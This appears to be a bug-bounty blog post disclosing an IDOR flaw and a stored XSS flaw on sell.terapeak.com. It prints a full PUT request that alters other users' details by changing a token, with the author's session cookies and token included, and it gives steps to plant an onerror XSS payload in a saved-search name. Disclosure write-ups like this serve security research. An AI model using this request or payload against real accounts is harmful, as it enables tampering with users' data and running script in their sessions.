Home

IDOR โ€“ Execute JavaScript into anyone account

Hey guys,

New blog post about critical IDOR issue which I found in terapeak.com which allows attackers to change any user information and delete any saved bulk search remotely through oneโ€™s own account by just changing the Token id in Put and DELETE Request.

The request for change and save search info looks like:

PUT /services/users/information?token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1&ulbrtabid=2c612dce-334d-49c4-ab4a-9080d5544f11&ulpagename=Settings& HTTP/1.1
Host: sell.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://sell.terapeak.com/?page=Settings
Content-Length: 40
Cookie: optimizelyEndUserId=oeu1476503787855r0.20443462719204775; optimizelySegments=%7B%22229813889%22%3A%22ff%22%2C%22229833781%22%3A%22referral%22%2C%22229852304%22%3A%22false%22%7D; optimizelyBuckets=%7B%223386134531%22%3A%223408741298%22%2C%227527391520%22%3A%227536641212%22%2C%226456040624%22%3A%226450293330%22%2C%225673570093%22%3A%225673580215%22%7D; __utma=195498537.885603089.1476503793.1478553390.1478557307.14; __utmz=195498537.1476503793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1476504127506%3B1478549584718%3B1478557781949%3B7%3B25; ki_r=; i18next=en-US; tp_ee_last_visit=1161937991; tp_ee_last_activity=1477297991; TERAPEAK_SESSID=t23qp3c6sqbmlgfjgrp1s3ho71; userRole=PHOENIX_PROFESSIONAL; currency=USD; tpebayCurrencyId=1; __tpa=1581941b032c10; tp_x8=69.0803835087417002-082f039pt%2FtjRC5DXUPHA4wudayrnWMIEpG8vsZYSBxk6gNKqoTF0mb7lfQJ1eO92ihV3zcL%3D; __utmc=195498537; localeHeader=en-US,en; totango.heartbeat.last_module=__system; totango.heartbeat.last_ts=1478557779843; lastUrl=https://sell.terapeak.com/; token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1; tokenExpiry=1510085976101; __utmb=195498537.4.10.1478557307; __utmt=1; optimizelyPendingLogEvents=%5B%5D
Connection: close

{"firstName":"test","type":"userDetail"}
    

It was observed that by simply changing the value of <token=> in the above URL, it is possible to change user info and delete search and save for the user associated with that particular Token.

Original Request:

Edited Request:

XSS

So I found stored XSS in saved search:

go to https://sell.terapeak.com/?page=eBayProductResearch
write anything in search box and click on search
click on save pop up will come
write your payload into name "><img src=x onerror=prompt(1)>
boom xss will execute.

An attacker can plot IDOR attack to change user saved search with a XSS payload and when user will access his account XSS will pop-up.

Thanks for reading! Happy Hunting ๐Ÿ™‚